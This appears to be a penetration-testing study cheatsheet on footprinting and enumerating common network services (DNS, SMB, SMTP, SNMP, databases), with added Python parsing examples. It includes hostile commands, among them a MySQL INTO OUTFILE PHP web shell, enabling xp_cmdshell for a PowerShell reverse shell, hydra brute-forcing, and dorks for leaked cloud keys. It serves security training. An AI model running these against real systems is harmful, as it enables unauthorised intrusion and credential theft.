Footprinting theory + cheatsheet
Footprinting common services
This post covers footprinting techniques from the CPTS course along with my cheatsheet for common enumeration methods.
Infrastructure Based Enumeration
Domain Information
Finding Valid Subdomains
Inspect the target's TLS certificate: the Subject Alternative Name (SAN) extension frequently lists other hostnames of the same organisation.
openssl s_client -connect example.com:443 -showcerts
https://crt.sh/
crt.sh is a public database of SSL certificates. You can search for a domain to see all associated subdomains.
View results in JSON
curl -s "https://crt.sh/?q=example.com&output=json" | jq .
Using Nmap and NSE to retrieve SSL certificate information (the ssl-cert script prints the subject and the SANs)
nmap --script ssl-cert -p 443 example.com
Querying DNS records. Many authoritative servers now answer ANY with a minimal response (RFC 8482), so fall back to querying individual record types if the output looks empty.
dig any inlanefreight.com
DNS record types:
- A Record (Address Record) – Maps a domain name to an IPv4 address so computers know where to find a website.
- MX Record (Mail Exchange) – Specifies which mail servers handle email for a domain.
- NS Record (Name Server) – Points to the DNS servers responsible for managing a domain’s records.
- TXT Record (Text Record) – Stores extra information, often for verification (e.g., SPF for email security or site ownership proof).
Cloud Resources
Google dorks for finding Cloud resources
AWS S3 Buckets
site:s3.amazonaws.com "companyname"
inurl:".s3.amazonaws.com" filetype:xml
Azure Blob Storage
site:blob.core.windows.net "companyname"
Google Cloud Storage (GCS) Buckets
site:storage.googleapis.com "companyname"
Publicly Indexed Environment Files (May Contain Cloud Keys)
filetype:env "AWS_ACCESS_KEY_ID" OR "AZURE_STORAGE_KEY" OR "GOOGLE_CLOUD_PROJECT"
Exposed Log Files
filetype:log "password" OR "secret"
Third party tools for enumerating Cloud resources
https://domain.glass/
Domain.glass aggregates DNS records, subdomains and related infrastructure for a domain.
https://buckets.grayhatwarfare.com/
GrayHatWarfare is a search engine that indexes publicly exposed cloud storage buckets from AWS, Azure, and GCP. It can be used to find files left open to the internet.
Host Based Enumeration
FTP - File Transfer Protocol - Port 21
ftp <IP>
Enter anonymous as the username (any password is accepted) if anonymous login is enabled.
Recursive listing
ftp> ls -R
Download file
ftp> get <filename>
Upload file
ftp> put <filename>
Exit
ftp> exit
Download All Available Files
wget -m --no-passive ftp://username:password@<IP>
If the password has special characters (@, :, !, etc.), URL-encode them.
Use debug/trace for detailed output of the FTP commands and server replies
ftp> debug
ftp> trace
Using nmap scripts
locate *.nse | grep ftp
Using these scripts
nmap --script "ftp-*" -p 21 <IP>
Interacting with FTP with TLS/SSL enabled (explicit FTPS via AUTH TLS)
openssl s_client -connect <IP>:21 -starttls ftp
SMB - Server Message Block - Port 445 / 139
Enumerating shares
smbclient -N -L //<IP>
Connecting to share
smbclient //<IP>/<sharename>
list files
smb: \> ls
download file
smb: \> get <filename>
Using nmap scripts
locate *.nse | grep smb
Using these scripts (SMB listens on 445 and, via NetBIOS, 139)
nmap --script "smb-*" -p 139,445 <IP>
Using rpcclient for enumeration. -U "" selects a null session and -N suppresses the password prompt. Enter a username if credentials are available.
rpcclient -U "" -N <IP>
RPCClient - Server Information
rpcclient $> srvinfo
RPCClient - Enumerate domains on the network
rpcclient $> enumdomains
RPCClient - Get domain, server and user information
rpcclient $> querydominfo
RPCClient - Enumerate all shares
rpcclient $> netshareenumall
RPCClient - Get information about a specific share
rpcclient $> netsharegetinfo <share>
RPCClient - Enumerate domain users
rpcclient $> enumdomusers
RPCClient - Query a specific user
rpcclient $> queryuser <RID>
RPCClient - Query a specific group
rpcclient $> querygroup <RID>
Brute Forcing User RIDs with script
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Brute Forcing User RIDs with Impacket
samrdump.py <IP>
Enumeration with SMBmap
smbmap -H <IP>
Using Enum4Linux-ng
./enum4linux-ng.py <IP> -A
Using NetExec
Enumerating shares
nxc smb <IP> -u '' -p '' --shares
Enumerating users through RID Bruteforcing
nxc smb <IP> -u '' -p '' --rid-brute
Enumerating Password policy
nxc smb <IP> -u '' -p '' --pass-pol
Enumerating Local groups
nxc smb <IP> -u '' -p '' --local-group
NFS - Network File System - Port 111 / 2049
Using nmap scripts
locate *.nse | grep nfs
Using these scripts
sudo nmap --script nfs* <IP> -sV -p111,2049
Show available NFS Share
showmount -e <IP>
Mounting NFS Share
mkdir target-NFS
sudo mount -t nfs <IP>:/ ./target-NFS/ -o nolock
cd target-NFS
-o nolock is used to prevent issues with NFS file locking in certain environments.
List Contents with Usernames & Group Names
ls -l target-NFS/
List Contents with numeric UIDs & GIDs (useful when the owning users do not exist locally; creating a local user with the same UID lets you access the files)
ls -n target-NFS/
Unmounting file share
cd ..
sudo umount ./target-NFS
DNS - Domain Name System - Port 53
Domain Name System (DNS) is responsible for mapping domain names to IP addresses. It consists of several server types:
Server Type | Description |
---|---|
DNS Root Server | Knows the authoritative servers for each top-level domain (TLD) and refers resolvers to them; holds no records for individual domains. |
Authoritative Nameserver | Holds the official records for a specific domain. |
Non-authoritative Nameserver | Caches DNS records from authoritative sources. |
Caching DNS Server | Temporarily stores DNS query results. |
Forwarding Server | Passes queries to another DNS server. |
Resolver | Resolves DNS queries locally (in routers, computers, etc.). |
Common DNS Record Types
DNS Record | Description |
---|---|
A | Maps a domain to an IPv4 address. |
AAAA | Maps a domain to an IPv6 address. |
MX | Specifies mail servers for the domain. |
NS | Identifies name servers for a domain. |
TXT | Stores arbitrary text data (e.g., SPF, DKIM, DMARC validation). |
CNAME | Creates an alias for another domain name. |
PTR | Reverse lookup: maps an IP to a domain name. |
SOA | Contains zone information and admin email. |
DNS Enumeration Commands
Find Name Servers
dig ns <target-domain>
host -t ns <target-domain>
Retrieve All DNS Records
dig any <target-domain>
host -a <target-domain>
Enumerate a Specific Record Type
dig <record-type> <target-domain>
host -t <record-type> <target-domain>
Examples:
dig mx example.com # Find mail servers
dig txt example.com # Find TXT records
dig soa example.com # Find SOA record
Reverse Lookup (PTR Record)
dig -x <IP>
host <IP>
Perform Zone Transfer (AXFR)
dig axfr <target-domain> @<dns-server>
Find Subdomains via Certificate Transparency Logs
curl -s "https://crt.sh/?q=<target-domain>&output=json" | jq .
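The crt.sh JSON above (and the earlier crt.sh query in the Domain Information section) returns one entry per certificate, with every SAN of that certificate packed into a single newline-separated name_value field, mixed case, wildcards and unrelated domains included. The script below is an added example, not part of the original cheatsheet: it de-duplicates that output into a clean hostname list. The JSON it parses is a constructed sample in the shape crt.sh returns; fetch_crtsh() performs the live query and is not exercised here.

```python
"""Turn crt.sh JSON into a de-duplicated subdomain list.

Added example, not part of the original cheatsheet. SAMPLE_CRTSH_JSON is a
constructed sample in the shape crt.sh returns for ?output=json; the real
query is wrapped in fetch_crtsh(), which needs network access.
"""
import json
import urllib.request

CRTSH_URL = "https://crt.sh/?q={domain}&output=json"

# Constructed sample: three certificates, one with several SANs in name_value,
# one wildcard, and one unrelated certificate that merely mentions the domain.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "example.com",
     "name_value": "example.com\nwww.example.com\nWWW.Example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nvpn.example.com"},
    {"issuer_name": "C=US, O=Some CA",
     "common_name": "notexample.com",
     "name_value": "notexample.com\nexample.com.evil.test"},
])


def fetch_crtsh(domain, timeout=30):
    """Fetch the raw crt.sh JSON for a domain (live request; not used in the test)."""
    req = urllib.request.Request(CRTSH_URL.format(domain=domain),
                                 headers={"User-Agent": "crtsh-subdomains/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def extract_subdomains(raw_json, domain):
    """Return sorted unique hostnames at or under `domain` from crt.sh JSON.

    name_value holds every SAN of a certificate, newline-separated, so it is
    split; a wildcard "*.dev.example.com" is reduced to "dev.example.com"
    because the wildcard still proves that zone exists; names are lowercased
    because DNS is case-insensitive and crt.sh keeps whatever the CA encoded.
    """
    domain = domain.lower().strip(".")
    names = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            # Apex or a true child only: "example.com.evil.test" must not match
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    for host in extract_subdomains(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

For a live target replace SAMPLE_CRTSH_JSON with fetch_crtsh("<target-domain>"); the resulting list feeds straight into the dig or nmap loops elsewhere on this page.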
Brute-Force Subdomains
Using SecLists:
for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt); do
dig $sub.<target-domain> @<dns-server> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt
done
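Both the zone transfer above and the brute-force loop produce raw dig output, and the grep/sed pipeline in the loop is easy to break (a TXT record containing the subdomain string, or a server that answers with a referral). The parser below is an added example, not part of the original cheatsheet: it turns dig output into records, tells a complete AXFR (SOA at both ends) from a refused one, and resolves in-zone CNAMEs into a host-to-address map. The zone text is a constructed AXFR response for example.com using RFC 5737 addresses; dig_axfr() shells out to the real dig and is not exercised here.

```python
"""Parse `dig` output (AXFR or per-name answers) into records and a host map.

Added example, not part of the original cheatsheet. SAMPLE_AXFR is a
constructed transfer for example.com (RFC 5737 addresses); dig_axfr() runs
the real dig and needs network access.
"""
import subprocess
from collections import namedtuple

Record = namedtuple("Record", "name ttl rtype rdata")

# Constructed dig axfr output: ';' comments, a blank line, and a zone that the
# server bracketed with its SOA, as every complete transfer is.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.24 <<>> axfr example.com @192.0.2.53
;; global options: +cmd
example.com.\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.\t3600\tIN\tNS\tns1.example.com.
example.com.\t3600\tIN\tTXT\t"v=spf1 include:_spf.example.net -all"
example.com.\t300\tIN\tMX\t10 mail.example.com.
ns1.example.com.\t3600\tIN\tA\t192.0.2.53
mail.example.com.\t300\tIN\tA\t192.0.2.25
mail.example.com.\t300\tIN\tAAAA\t2001:db8::25
www.example.com.\t300\tIN\tCNAME\tmail.example.com.
internal.example.com.\t300\tIN\tA\t198.51.100.10
example.com.\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600

;; Query time: 2 msec
;; SERVER: 192.0.2.53#53(192.0.2.53) (TCP)
"""


def parse_dig(text):
    """Return Record tuples from dig output; ';' comment lines and blanks are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(";"):
            continue
        parts = line.split(None, 4)   # name ttl class type rdata (rdata may contain spaces)
        if len(parts) < 5 or parts[2] != "IN":
            continue                  # not a resource record (e.g. a stray error message)
        name, ttl, _cls, rtype, rdata = parts
        records.append(Record(name.rstrip(".").lower(), int(ttl), rtype, rdata.strip()))
    return records


def transfer_complete(records):
    """An AXFR is only trustworthy when an SOA opens and closes it; a refused
    transfer ('; Transfer failed.') yields no records at all."""
    soa = [r for r in records if r.rtype == "SOA"]
    return len(soa) >= 2 and records[0].rtype == "SOA" and records[-1].rtype == "SOA"


def host_map(records):
    """Map each hostname to its addresses, following one CNAME hop inside the zone."""
    addrs, cnames = {}, {}
    for r in records:
        if r.rtype in ("A", "AAAA"):
            addrs.setdefault(r.name, []).append(r.rdata)
        elif r.rtype == "CNAME":
            cnames[r.name] = r.rdata.rstrip(".").lower()
    for alias, target in cnames.items():
        # Out-of-zone or chained targets simply leave the alias without addresses
        addrs[alias] = addrs.get(alias, []) + addrs.get(target, [])
    return addrs


def dig_axfr(domain, server):
    """Run the real zone transfer (live network; not used in the test)."""
    out = subprocess.run(["dig", "axfr", domain, "@" + server],
                         capture_output=True, text=True, check=False).stdout
    return parse_dig(out)


if __name__ == "__main__":
    recs = parse_dig(SAMPLE_AXFR)
    print("complete transfer:", transfer_complete(recs))
    for host, ips in sorted(host_map(recs).items()):
        print(f"{host:25} {', '.join(ips)}")
```

The same parse_dig() works on the per-name output of the brute-force loop (run dig with +noall +answer to drop the comment lines first), so hits from both techniques land in one host list.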
Using dnsenum:
dnsenum --dnsserver <dns-server> --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt <target-domain>
DNS Enumeration with Nmap
Locate DNS NSE Scripts
locate *.nse | grep dns
Run DNS Enumeration Scripts
nmap --script "dns-*" -p 53 <target-domain>
SMTP - Simple Mail Transfer Protocol - Port 25 / 465 / 587
Understanding SMTP
Simple Mail Transfer Protocol (SMTP) is used for sending emails between clients and servers. It operates mainly on the following ports:
Port | Usage |
---|---|
25 | Server-to-server relay; ISPs often block it outbound from client networks. |
465 | SMTP over implicit TLS (SMTPS): the connection is encrypted from the first byte. |
587 | Mail submission port; starts in plaintext and upgrades with STARTTLS. |
SMTP is often used in combination with POP3 (Port 110) or IMAP (Port 143) to receive emails.
Common SMTP Commands
Command | Description |
---|---|
HELO/EHLO | Initiates a session with the SMTP server. |
MAIL FROM | Specifies the sender’s email address. |
RCPT TO | Specifies the recipient’s email address. |
DATA | Signals the start of email body transmission. |
VRFY | Checks if an email address exists (User Enumeration). |
EXPN | Expands a mailing list to show all recipients. |
RSET | Aborts the current email transaction. |
NOOP | Keeps the connection open without performing any action. |
QUIT | Terminates the session. |
Note: Many modern SMTP servers disable VRFY and EXPN (a 502 reply means the command is off). If so, probe with RCPT TO instead: after MAIL FROM, a 250 to RCPT TO:<user@domain> versus a 550 for unknown addresses leaks the same information (smtp-user-enum -M RCPT automates this).
SMTP Enumeration Commands
Banner Grabbing
nc -nv <IP> 25
telnet <IP> 25
- Reveals the SMTP server version and potential misconfigurations.
Example Output:
220 mail.example.com ESMTP Postfix
Find Available SMTP Commands
ehlo example.com
- Lists supported extensions such as VRFY, EXPN, STARTTLS, AUTH, etc.
Enumerate Valid Users Using VRFY (If Allowed)
vrfy root
vrfy admin
vrfy user123
- If the user exists, Postfix answers "252 2.0.0 root" (252 means "cannot verify, but will accept"); an unknown user gets "550 5.1.1 <user>: Recipient address rejected: User unknown".
Using EXPN (Expands Mailing Lists)
expn admin
expn users
expn mailinglist
- May return a full list of emails if enabled.
Brute-Force User Enumeration with SMTP
for user in $(cat users.txt); do
  printf 'HELO pentest.local\r\nVRFY %s\r\nQUIT\r\n' "$user" | nc -nv <IP> 25 | grep -E '^(252|550)' | sed "s/^/$user: /";
done
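The VRFY technique above depends on a well-formed session: the banner has to be consumed before the first command, one HELO precedes the VRFY probes, and the reply code (252 or 250 known, 550 unknown, 502 disabled) decides the verdict. The script below is an added example, not part of the original cheatsheet, that runs that exchange against a constructed in-process mock answering like a Postfix server with VRFY enabled, so both sides of the conversation are visible and the client can be pointed at a real host on port 25 unchanged. The mock's user list and the candidate names are made up.

```python
"""SMTP user enumeration via VRFY, with the exchange shown end to end.

Added example, not part of the original cheatsheet. The target is a
constructed in-process mock that answers like Postfix with VRFY enabled
(252 for known users, 550 otherwise); KNOWN_USERS is made-up mock data.
"""
import socket
import threading

KNOWN_USERS = {"root", "www-data", "jsmith"}   # constructed mock data


def _mock_smtp_server(sock):
    """Minimal single-connection SMTP responder: banner, HELO/EHLO, VRFY, QUIT."""
    conn, _ = sock.accept()
    with conn:
        conn.sendall(b"220 mail.example.com ESMTP Postfix\r\n")
        buf = b""
        while True:
            data = conn.recv(1024)
            if not data:
                return
            buf += data
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                cmd, _, arg = line.decode(errors="replace").partition(" ")
                cmd = cmd.upper()
                if cmd in ("HELO", "EHLO"):
                    conn.sendall(b"250 mail.example.com\r\n")
                elif cmd == "VRFY":
                    if arg in KNOWN_USERS:
                        conn.sendall(f"252 2.0.0 {arg}\r\n".encode())
                    else:
                        conn.sendall(f"550 5.1.1 <{arg}>: Recipient address rejected: User unknown\r\n".encode())
                elif cmd == "QUIT":
                    conn.sendall(b"221 2.0.0 Bye\r\n")
                    return
                else:
                    conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def start_mock_server():
    """Bind the mock on a free loopback port, serve one connection in a thread, return the port."""
    sock = socket.socket()
    sock.bind(("127.0.0.1", 0))
    sock.listen(1)
    threading.Thread(target=_mock_smtp_server, args=(sock,), daemon=True).start()
    return sock.getsockname()[1]


def _read_reply(f):
    """Read one SMTP reply, skipping multi-line continuations ('250-...')."""
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        if len(line) < 4 or line[3] != "-":
            return line


def vrfy_enum(host, port, candidates, helo="pentest.local", timeout=5):
    """Return {user: reply_code} for each candidate, all within one session.

    The banner is read first (an `echo VRFY | nc` one-liner races it), then
    one HELO, then one VRFY per name. 250/252 = accepted, 550 = unknown,
    502 = VRFY disabled, so fall back to RCPT TO probing.
    """
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _read_reply(f)                                  # 220 banner
        s.sendall(f"HELO {helo}\r\n".encode())
        _read_reply(f)                                  # 250 greeting
        for user in candidates:
            s.sendall(f"VRFY {user}\r\n".encode())
            results[user] = _read_reply(f)[:3]
        s.sendall(b"QUIT\r\n")
        _read_reply(f)                                  # 221 Bye
    return results


def valid_users(results):
    """Names the server confirmed; 252 ('cannot verify but will accept') counts as confirmed."""
    return sorted(u for u, code in results.items() if code in ("250", "252"))


if __name__ == "__main__":
    port = start_mock_server()
    res = vrfy_enum("127.0.0.1", port, ["root", "admin", "jsmith", "user123"])
    print(res)
    print("valid:", valid_users(res))
```

Against a real target call vrfy_enum("<IP>", 25, users) with the wordlist from users.txt; if every code comes back 502 the server has VRFY disabled and the RCPT TO approach from the note above is the next step.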
Sending Emails via SMTP
Connect to SMTP Server
telnet <IP> 25
Start a Mail Session
HELO example.com
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@example.com>
DATA
Write and Send Email
Subject: Test Email
This is a test email sent via SMTP enumeration.
.
QUIT
- A single . (dot) on a line of its own terminates the message body.
Checking for Open Relays (Misconfigurations)
An open relay allows anyone to send emails without authentication, often leading to spam and phishing attacks.
Test Open Relay with Telnet
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@anydomain.com>
DATA
Subject: Open Relay Test
This is a test email.
.
QUIT
- If accepted, the server is an open relay, allowing unauthorized emails.
Use Nmap to Check for Open Relay
nmap --script smtp-open-relay -p 25 <IP>
Example Output:
smtp-open-relay: Server is an open relay (16/16 tests)
Locate SMTP NSE Scripts
locate *.nse | grep smtp
Run Common SMTP Enumeration Scripts
nmap --script "smtp-*" -p 25,465,587 <IP>
Using SMTP User Enum
smtp-user-enum -M VRFY -U users.txt -t <IP>
Brute-forcing SMTP AUTH credentials with hydra is a separate step from user enumeration (it needs the server to advertise AUTH in its EHLO response). -S makes hydra connect with TLS, so use it against the implicit-TLS port 465 only; on port 25 leave it out:
hydra -L users.txt -P passwords.txt -s 25 <IP> smtp
IMAP / POP3 - Internet Message Access Protocol - Post Office Protocol - Port 143 / 993 / 110 / 995
Understanding IMAP & POP3
IMAP (Internet Message Access Protocol) and POP3 (Post Office Protocol) are used to retrieve emails from a mail server.
Protocol | Port | Usage |
---|---|---|
IMAP | 143 | Retrieves emails while keeping them on the server. |
IMAPS (IMAP Secure) | 993 | IMAP over SSL/TLS encryption. |
POP3 | 110 | Retrieves emails and removes them from the server. |
POP3S (POP3 Secure) | 995 | POP3 over SSL/TLS encryption. |
Common IMAP Commands
Command | Description |
---|---|
1 LOGIN <username> <password> | Authenticates the user. |
1 LIST "" * | Lists all available mail directories. |
1 CREATE "INBOX" | Creates a new mailbox. |
1 DELETE "INBOX" | Deletes a mailbox. |
1 SELECT INBOX | Selects a mailbox for reading messages. |
1 FETCH <ID> all | Retrieves all data associated with an email message. |
1 CLOSE | Removes all messages marked as deleted. |
1 LOGOUT | Terminates the session with the IMAP server. |
Common POP3 Commands
Command | Description |
---|---|
USER <username> | Identifies the user. |
PASS <password> | Authenticates the user. |
STAT | Displays the number of emails in the mailbox. |
LIST | Lists all emails with their size. |
RETR <ID> | Retrieves an email message by ID. |
DELE <ID> | Deletes an email by ID. |
RSET | Resets the mailbox state. |
QUIT | Terminates the session with the POP3 server. |
IMAP & POP3 Enumeration Commands
Scan for IMAP & POP3 Services
nmap -sV -p110,143,993,995 <IP>
- Detects Dovecot, Exchange, or other mail services.
- Shows SSL certificates and mail server details.
Extract IMAP/POP3 Capabilities
openssl s_client -connect <IP>:143 -starttls imap
openssl s_client -connect <IP>:110 -starttls pop3
- Reveals supported authentication mechanisms.
- Shows TLS/SSL configurations.
Brute-Force IMAP & POP3 Credentials Using hydra:
hydra -L users.txt -P passwords.txt imap://<IP> -V
hydra -L users.txt -P passwords.txt pop3://<IP> -V
- Attempts to log in using username/password lists.
Access Mailbox with curl (-k skips certificate validation, which self-signed mail servers usually need)
curl -k 'imaps://<IP>' --user <user>:<password>
or
curl -k --url "imaps://<IP>/INBOX" --user <user>:<password>
- Lists email folders upon successful authentication.
Enumerate Mailbox via IMAP
openssl s_client -connect <IP>:993
Then interact using:
1 LOGIN <user> <password>
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 all
- Fetches email messages and metadata.
Enumerate Mailbox via POP3
openssl s_client -connect <IP>:995
Then interact using:
USER <user>
PASS <password>
STAT
LIST
RETR 1
- Retrieves email content from the server.
Using Nmap Scripts for IMAP and POP3
locate *.nse | grep imap
locate *.nse | grep pop3
nmap --script "imap-*" -p 143,993 <IP>
nmap --script "pop3-*" -p 110,995 <IP>
SNMP - Simple Network Management Protocol - Port 161 / 162
Understanding SNMP
Simple Network Management Protocol (SNMP) is used for monitoring and managing network devices like routers, switches, servers, and IoT devices.
It operates on:
- UDP 161 for requests.
- UDP 162 for receiving SNMP traps (unsolicited alerts from devices).
Discover SNMP Services
nmap -sU -p 161 --script=snmp-info <IP>
Walk the whole MIB tree with the default community strings (public, private). A read-only string already leaks system description, interfaces, running processes, installed software and often local usernames.
snmpwalk -v2c -c public <IP>
snmpwalk -v1 -c public <IP>
Bruteforce Community Strings
onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt <IP>
Query a Specific OID
snmpget -v2c -c public <IP> .1.3.6.1.2.1.1.1.0
Walk with SNMPv3 credentials (authPriv: SHA authentication, AES privacy). SNMPv3 has no community strings; a valid username and keys are required.
snmpwalk -v3 -u <username> -l authPriv -A <password> -X <encryption_key> -a SHA -x AES <IP>
Enumerate running processes (hrSWRunName, HOST-RESOURCES-MIB); command-line parameters live in the sibling column .1.3.6.1.2.1.25.4.2.1.5 and frequently contain passwords
snmpwalk -v2c -c public <IP> .1.3.6.1.2.1.25.4.2.1.2
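The hrSWRunTable walk above returns one line per column per process, so the useful view (a ps-style list, and a grep of command lines for credentials) has to be assembled from the name, path and parameter columns keyed by PID. The script below is an added example, not part of the original cheatsheet, that does that join over a constructed net-snmp style dump; the OIDs are the real hrSWRunTable columns, while the process list and the leaked password are made up.

```python
"""Join HOST-RESOURCES-MIB hrSWRunTable columns from snmpwalk output into a
process list and flag command lines that leak secrets.

Added example, not part of the original cheatsheet. SAMPLE_WALK is a
constructed net-snmp style dump; the OID columns are the real ones
(.2 hrSWRunName, .4 hrSWRunPath, .5 hrSWRunParameters, indexed by PID).
"""
import re

# Accepts both the "iso." and the numeric ".1." prefix that snmpwalk -On prints
HR_SW_RUN = r"(?:iso|\.1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(\d+)\.(\d+) = (\w[\w-]*): (.*)"
COLUMNS = {2: "name", 4: "path", 5: "params"}
SECRET_HINT = re.compile(r"(pass(word|wd)?|pwd|secret|token|api[_-]?key)(\s|=|:)", re.I)

SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.812 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.1337 = STRING: "python3"
iso.3.6.1.2.1.25.4.2.1.2.2048 = STRING: "mysqld"
iso.3.6.1.2.1.25.4.2.1.4.1 = STRING: "/sbin/init"
iso.3.6.1.2.1.25.4.2.1.4.812 = STRING: "/usr/sbin/sshd"
iso.3.6.1.2.1.25.4.2.1.4.1337 = STRING: "/usr/bin/python3"
iso.3.6.1.2.1.25.4.2.1.4.2048 = STRING: "/usr/sbin/mysqld"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.812 = STRING: "-D"
iso.3.6.1.2.1.25.4.2.1.5.1337 = STRING: "backup.py --db-user backup --db-password Sup3rS3cret!"
iso.3.6.1.2.1.25.4.2.1.5.2048 = STRING: "--datadir=/var/lib/mysql"
iso.3.6.1.2.1.25.4.2.1.7.812 = INTEGER: 1
"""


def parse_hr_sw_run(text):
    """Return {pid: {"name", "path", "params"}} from snmpwalk output of the hrSWRunTable."""
    procs = {}
    for line in text.splitlines():
        m = re.match(HR_SW_RUN, line)
        if not m:
            continue
        col, pid, vtype, value = int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)
        if col not in COLUMNS:
            continue                      # status/type columns are not needed for a ps view
        if vtype == "STRING":
            value = value.strip('"')      # net-snmp quotes STRING values
        procs.setdefault(pid, {"name": "", "path": "", "params": ""})[COLUMNS[col]] = value
    return procs


def command_lines(procs):
    """Rebuild 'path params' per PID, falling back to the bare name when no path was returned."""
    out = {}
    for pid, p in procs.items():
        cmd = p["path"] or p["name"]
        if p["params"]:
            cmd += " " + p["params"]
        out[pid] = cmd
    return out


def find_secrets(procs):
    """(pid, cmdline) pairs whose arguments look like credentials, in PID order."""
    return [(pid, cmd) for pid, cmd in sorted(command_lines(procs).items())
            if SECRET_HINT.search(cmd)]


if __name__ == "__main__":
    procs = parse_hr_sw_run(SAMPLE_WALK)
    for pid, cmd in sorted(command_lines(procs).items()):
        print(f"{pid:>6}  {cmd}")
    print("possible secrets:", find_secrets(procs))
```

Feed it the real output of snmpwalk -v2c -c public <IP> .1.3.6.1.2.1.25.4.2.1 (the whole table, not just column .2) to get all three columns in one pass.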
Brute-Force SNMP OIDs
braa public@<IP>:.1.3.6.*
Using Nmap scripts
locate *.nse | grep snmp
nmap --script "snmp-*" -p 161 <IP>
MySQL - Relational Database Management System - Port 3306
Using nmap scripts
sudo nmap <IP> -sV -sC -p3306 --script mysql*
Connect to mysql
mysql -u <Username> -p<Password> -h <IP>
See available databases
MySQL [(none)]> show databases;
See DB Version
MySQL [(none)]> select version();
Select database
MySQL [(none)]> use mysql;
Enumerate tables
MySQL [mysql]> show tables;
Show columns of a table
MySQL [mysql]> show columns from <table>;
Show all information in a table
MySQL [mysql]> select * from <table>;
Search for needed string in the desired table.
MySQL [mysql]> select * from <table> where <column> = "<string>";
Bruteforcing credentials with hydra
hydra -L users.txt -P passwords.txt -s 3306 -f <IP> mysql
If the account has the FILE privilege and secure_file_priv is empty (or points at the web root; check it with SHOW VARIABLES), we can drop a PHP shell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
MSSQL - Microsoft SQL Server - Port 1433
Scanning for MSSQL Services
nmap -p 1433 --script ms-sql-* <IP>
If you have valid credentials, you can connect and enumerate the databases:
python3 mssqlclient.py <Username>:<password>@<IP>
List databases after connecting:
SQL> select name from sys.databases;
Check current user privileges:
SELECT IS_SRVROLEMEMBER('sysadmin');   -- server role: 1 if the current login is sysadmin
SELECT IS_MEMBER('db_owner');          -- database roles are checked with IS_MEMBER, not IS_SRVROLEMEMBER
SELECT IS_MEMBER('db_datareader');     -- can read every table in the current database
SELECT IS_MEMBER('db_datawriter');     -- can modify data in the current database
1 means the role is held, 0 means it is not, and NULL means the role does not exist in that scope (which is what IS_SRVROLEMEMBER returns when handed a database role).
If xp_cmdshell is enabled, you can execute system commands:
EXEC xp_cmdshell 'whoami';
If xp_cmdshell is disabled, we can enable it:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic MSSQL Enumeration
List all databases
SELECT name FROM master.sys.databases;
Switch to a database
USE <database_name>;
List all tables in the current database
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;
List all columns in a specific table
SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Users';
List all stored procedures
SELECT name FROM sys.procedures;
Check MSSQL version
SELECT @@VERSION;
Reverse shell from xp_cmdshell. Get a Base64 PowerShell payload from http://revshells.com/; -enc expects the script UTF-16LE encoded before Base64, which the site's Base64 PowerShell option does for you.
EXEC xp_cmdshell 'powershell -enc BASE64_PAYLOAD';
Oracle TNS - Transparent Network Substrate - Port 1521
Scanning for Oracle TNS Services
nmap -p 1521 --script oracle-tns-version <IP>
Brute-force Oracle SIDs:
nmap --script oracle-sid-brute -p 1521 <IP>
Enumerate users once a SID is known (Nmap ships no Oracle vulnerability scripts; its Oracle NSE scripts are oracle-tns-version, oracle-sid-brute, oracle-enum-users, oracle-brute and oracle-brute-stealth, and all but the first two need a SID):
nmap -p 1521 --script oracle-enum-users --script-args oracle-enum-users.sid=<SID> <IP>
Oracle Enumeration with ODAT
ODAT (Oracle Database Attacking Tool) is useful for enumeration and exploitation.
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip3 install -r requirements.txt
Check if the target is properly configured:
./odat.py all -s <IP>
Find valid credentials:
./odat.py passwordguesser -s <IP> -d XE --accounts-file accounts/accounts.txt
In ODAT, -U and -P are the credentials used to authenticate, not wordlists; passwordguesser takes a file of login/password pairs via --accounts-file (ODAT ships default lists in its accounts/ directory).
Brute-forcing Oracle Credentials
